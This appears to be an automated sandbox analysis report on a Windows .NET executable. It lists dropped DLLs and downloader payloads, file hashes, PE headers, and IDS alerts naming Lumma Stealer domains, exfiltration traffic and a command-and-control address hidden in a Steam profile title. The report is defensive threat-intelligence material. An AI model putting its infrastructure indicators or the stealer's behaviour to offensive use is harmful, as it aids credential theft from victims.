Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428159" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 6SoKuOqyNh.exe, Detection: malicious, Browse Filename: IRqsWvBBMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JGKjBsQrMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1lKbb2hF7fYToopfpmEvlyRN.exe.log

Download File

Process:	C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DBAAFIDGDA.exe.log

Download File

Process:	C:\ProgramData\DBAAFIDGDA.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DGDBKFBAKF.exe.log

Download File

Process:	C:\ProgramData\DGDBKFBAKF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199747278259[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.399215441649575
Encrypted:	false
SSDEEP:	768:/dpqm+0Ih3tAA9CWGVGfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2N:/d8m+0Ih3tAA9CWGVGFJTBv++nIjBtPZ
MD5:	A67863DBEA6D2C538973DE3CF938A727
SHA1:	26789A41DB0A703ED91FE5239811CB22CB102453
SHA-256:	86068CCF33F0F3F3840CA02BD57C96EF12F8492437552554F8C8F93C170C6D06
SHA-512:	558986EDEA92A2DAD96F57DCC6A46B857F9AA960AC77B14039583EDA05D2DF4DCC86155834A36C5840EE8D29EB4300794A1B1AAB08BA224A250E5FDED818521A
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://5.75.212.60\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\jen1hg[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4929536
Entropy (8bit):	7.39389892963929
Encrypted:	false
SSDEEP:	98304:2t9Kw5Ea4QR/YUxIUnnxIMSsDPUCfCxg+6hUNLindy:mkw6ER/YUZnxIw8ICxvoQcdy
MD5:	8E5286E3CAA11C78E275892A38F2E772
SHA1:	DDADA2F646640B394C04E7166DB04200D226281B
SHA-256:	9F619F332A9E5BD74A345778E86A871E9EFB087BFEA43ADE7CBF9F63A12151B0
SHA-512:	4F180892333915A52F5E2EE7A69D0BA628ED3D6C6425E2BA4B41F0ED5A06898B25BC0A0432DC6372ADD0C811B16E74D636A6466BA64FD9CCC34A93E900B5F5CE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\jen1hg[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m.f..................H..x........H.. ....H...@.. ........................K...........@...................................H.K.....I..p....................K.......H.............................................. ............... ..H............text...$.H.. ....H................. ..`.sdata........H.......H.............@....rsrc....p....I..r....H.............@..@.reloc........K......6K.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gfn1go[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	5109736
Entropy (8bit):	7.432541336885682
Encrypted:	false
SSDEEP:	98304:XlawqpTSo3yQr+MykPTcY/BUeAALrzqjx764OFQVf:Xla82r+MykPTh6Pwq8aVf
MD5:	675737D9B22BCFEFE651C11BD47D404C
SHA1:	4B49F56572B458873B52EAA990F09556D37A54A1
SHA-256:	8B020CDE39D33B53F4C48A8C7EA30FB1F7854B13562508C0A1665FFD1397F7FC
SHA-512:	0F25D1CC861C781A2BABA08F0297963672DF51A328A37038455AAABD8953F3AD38B04FBEA473139FC6CD16004905556368B919325F0B72FAEB16D0DCFAE8D2A2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gfn1go[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.f..................K..@........K.. ....K...@.. ....................... N......oN...@.................................P.K.K.....K..8............M.......N.......K.............................................. ............... ..H............text.....K.. ....K................. ..`.sdata........K.......K.............@....rsrc....8....K..:....K.............@..@.reloc........N.......M.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466355736535456
Encrypted:	false
SSDEEP:	6144:kIXfpi67eLPU9skLmb0b4OWSPKaJG8nAgejZMMhA2gX4WABl0uNddwBCswSb+:ZXD94OWlLZMM6YFH7++
MD5:	4CA619D1D145C91551D75FFE66F12265
SHA1:	85E68EF36899B8604B0C4096057C10D79ADBCAD4
SHA-256:	F24A38F7C07B5EA16272762912B066438D002D3EE5A5225AFACB7E63E1837927
SHA-512:	F45C392DFAF117CB0016194C1F0330E3E26679928C3508B4125BFE16F55933E1BD6ADC7F0CFCB820A9092386636C5FDE3C7ADE95062657AC77F2CF7D07AAD4CD
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.kY.\|...............................................................................................................................................................................................................................................................................................................................................4.O.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.213730713244715
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	1lKbb2hF7fYToopfpmEvlyRN.exe
File size:	6'406'656 bytes
MD5:	3472874efe2c665ab11817ce53216d21
SHA1:	6a75e87df5e211ab55e4daa4f5db59552b480c6a
SHA256:	a35e785bcf822d20a6bfb76d4dd3f78ecebaf8147f03ee2ffd8d492ac8cc657f
SHA512:	833ad39afa8f8f6fa9293083a9ec98f4e1cf776decdb6b7c61edf0f8f12b4ba4d83537a2f740cdab836477c9545c439e7b6fdfbfb84fc6b2bc507d47374ea6c4
SSDEEP:	98304:8BrveYNl+D1tGjK35IS0d2oG6aXqE44oL9mb2ZZyEq:iveYNl+xQY5IS0a6qqnQt
TLSH:	13569D027694CB11C27A4B33CCDF842847FEEE917653DA2E7D99B29D652136E090E2CD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................`.........~.`.. ....`...@.. .......................@b...........@................................

File Icon


Icon Hash:	3e366153f3f3f306

Static PE Info

General

Entrypoint:	0xa0c47e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A2170A [Thu Jul 25 09:12:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x60c430	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x610000	0x11178	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x622000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x60c3e7	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x60a484	0x60a600	c0d1e99199d0c07d19ecf17c3ec0d1f1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x60e000	0x2ca	0x400	268f004baba3835d06c513fd6532c337	False	0.5966796875	data	4.735844600398633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x610000	0x11178	0x11200	5ea3caf350c271a24028e3686e962f42	False	0.6867301551094891	data	6.549733185476095	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x622000	0xc	0x200	7652d3e1e685295c2ddcaa28bd403a7e	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x6101f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m	0.5186170212765957
RT_ICON	0x610658	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m	0.3897748592870544
RT_ICON	0x611700	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m	0.35352697095435687
RT_ICON	0x613ca8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m	0.31973311289560696
RT_ICON	0x617ed0	0x8ce7	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9993069224584846
RT_GROUP_ICON	0x620bb8	0x4c	data	0.8157894736842105
RT_VERSION	0x620c04	0x388	data	0.4192477876106195
RT_MANIFEST	0x620f8c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T18:56:52.536920+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49760	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:53.769976+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49762	443	192.168.2.4	172.67.213.85
2024-07-26T18:57:37.044435+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	49787	65.108.151.108	192.168.2.4
2024-07-26T18:57:00.379251+0200	TCP	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	49770	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:44.417959+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49758	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:57.175236+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49767	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:55.890606+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49765	443	192.168.2.4	172.67.213.85
2024-07-26T18:56:20.280627+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	49740	443	192.168.2.4	5.75.212.60
2024-07-26T18:56:55.374358+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49764	443	192.168.2.4	172.67.213.85
